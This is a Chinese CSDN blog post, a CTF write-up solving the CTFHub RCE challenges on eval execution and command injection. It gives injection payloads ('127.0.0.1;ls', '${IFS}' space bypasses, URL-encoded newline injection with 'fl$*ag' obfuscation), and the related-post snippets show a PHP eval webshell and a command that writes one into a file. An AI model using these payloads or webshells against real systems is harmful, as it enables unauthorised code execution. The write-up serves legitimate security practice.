ctfhub技能树web:RCE里的eval执行和命令注入

于 2024-03-30 22:09:54 发布
阅读量302 收藏 7
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81010533/article/details/137185033
版权

RCE:远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。

常见可代替命令:more:一页一页的显示档案内容

less:与 more 类似

head:查看头几行

tac:从最后一行开始显示,可以看出 tac 是 cat 的反向示

tail:查看尾几行

nl:显示的时候,顺便输出行号

od:以二进制的方式读取档案内容

vi:一种编辑器,这个也可以查看

vim:一种编辑器,这个也可以查看

sort:可以查看

uniq:可以查看

ls:查看目录

dir:查看目录

CTF中常用的绕过过滤空格的方法有:$IFS

$IFS$1

${IFS}

$IFS$9

<比如cat<a.tct:表示cat a.txt

<>{cat,flag.php}  //用逗号实现了空

格功能,需要用{}括起来

%20

%09

eval执行

检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else 。

使用蚁剑连接 cmd 参数试试,测试连接发现可以成功连接,说明此题存在 eval 执行

检查目录列表发现关于flag的文件,检查内容发现flag

命令注入——无过滤

首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;cat+文件名

查看网页源代码得到flag

过滤cat

执行命令127.0.0.1;ls,发现几个PHP文件

因为cat会被过滤,使用more命令去代替它,127.0.0.1; more flag_75551886717304.php,查看源代码得到flag

过滤空格

执行命令 127.0.0.1;ls,查看可以访问的文件,发现一个flag_681639692898.php

使用cat命令去查看这个文件中有什么,并且此时要绕过对空格的过滤,执行命令:127.0.0.1; cat${IFS}flag_681639692898.php,并查看源代码,得到flag

过滤目录分隔符

用cd 命令查看这个文件夹127.0.0.1;cd flag_is_here;ls

然后cat flag_18515776511094.php执行命令127.0.0.1;cd flag_is_here;catflag,查看源代码,得到flag

过滤运算符

用;ls查看目录

用cat命令查找flag

查看源代码得到flag

综合练习

在URL地址栏输入命令?ip=%0als

列举文件夹下的文件,输入命令

?ip=127.0.0.1%0D%0Acd${IFS}fl$*ag_is_here%0als#

查找flag,输入命令

?ip=127.0.0.1%0D%0Acd${IFS}fl$*ag_is_here%0ahead${IFS}fl$*ag_29101388310349.php#

查看源代码得到flag

暗香盈袖16
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
CTFHUB——RCEeval执行和文件包含漏洞
m0_46467017的博客
08-31 4909
代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这就不再赘述了。代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。连接成功后,其余步骤与上一关相同。...
ctfhub--技能树rce
lulu001128的博客
02-28 651
解题思路
CTFHubRCEeval执行
cx_sam的博客
08-07 914
CTFHub RCE eval执行
一篇文章带你进阶CTF命令执行
最新发布
csjjjd的博客
12-21 1717
文件日志直接给你了,接下来ctrl+f可以直接搜索网页特殊字符,比如flag,接下来网页就会帮你锁定位置,是不是以为flag就直接出来了?当然没有那么简单,哈哈,这次没有flag,不过这条命令一般都是可以执行的,可以看到很多有用信息,有些题目有时甚至flag就直接出来了。,会将 GET 参数 "shy" 的值作为文件包含的路径,并执行该文件的内容。3.对flag的过滤(这也就几个,索性就全丢出来了)的指令,如果没有看到,那就使用我这篇文章上面的指令。1.‘’ (例如fl‘’ag)
ctf命令执行小结
舞动的獾
10-04 4460
1.相关函数 eval函数eval函数能够将字符串当作命令执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码及命令执行漏洞全解在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTFHub笔记之技能树RCEeval执行、文件包含、远程包含、php://input、读取源代码
weixin_48799157的博客
03-28 4431
小白一个,如有错误请指正! 一、eval执行 ?cmd=system("ls"); ?cmd=system("ls%20/"); ?cmd=system("cat%20/flag_26396");
ctfhubRCE命令注入
weixin_43326436的博客
06-12 1853
一.实验环境ctfhub RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 LINUX系统的管道符: 1," ; ": 执行完前面的语句在执行后面的语句。 2.“ | “: 显示后面的语句的执行结果。 3.” || “:当前的语句执行出错时,
CTFHUB-RCE-eval执行
u014794539的博客
07-11 253
考点 一句话木马 eval执行 思路分析 打开直接 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 那就直接连蚁剑了。。。。 直接找到了 得到flag ctfhub{587c0757ccda0ba89da63da0} ...
CTFHUB RCE-----eval执行
winofkill的博客
12-11 1665
首先进入题目 我们先了解一下php当中eval()函数的作用 eval()函数中的evalevaluate的简称,这个函数的作用就是把一段字符串当作PHP语句来执行。 比如说eval($_REQUEST["cmd"]) $_REQUEST[]是接收数据用的,而其中的cmd 就是其中的数据 进入题目 cmd是其中的参数,我们就把命令赋给cmd,我们先显示一下网页的根目录 ?cmd=system("ls "); 接着我们看上一级目录 ?cmd=system("ls /")..
CTFHub_技能树_WebRCE——“eval执行”、“命令注入
Ho1aAs‘s Blog
07-23 8699
文章目录一、eval执行二、命令注入完 –>CTFHub传送门<– 一、eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> PHP代码显示,要求将命令赋值给cmd然后执行 先查看一下根目录文件 /?cmd=system("ls"); !切记最后的分号不可省略! 没有需要的文件 看看上一级的文件夹 /
CTFHUB-web-RCEwp总结
Alexhirchi的博客
04-13 792
cat 由第一行开始显示内容,并将所有内容输出 tac 从最后一行倒序显示内容,并将所有内容输出 more 根据窗口大小,一页一页的现实文件内容 less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符 head 只显示头几行 tail 只显示最后几行 nl 类似于cat -n,显示时输出行号 tailf 类似于tail -f 命令注入 提示:这是一个在线测试网络延迟...
CTFHUB 基础-----命令执行第一关
SopRomeo的博客
03-18 1214
cat 可以用,flag不在这,找了很久都没有,最终发现可以写一句话木马进去 LINUX指令 看了web,发现要转义 1;echo "<?php @eval(\$_POST['cmd']);?>" > 2.php 不知道为啥要转义,可能linux指令要这样…或者过滤了 不能cat一大窜数字的文件,菜刀点进去看,面有flag… ...
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值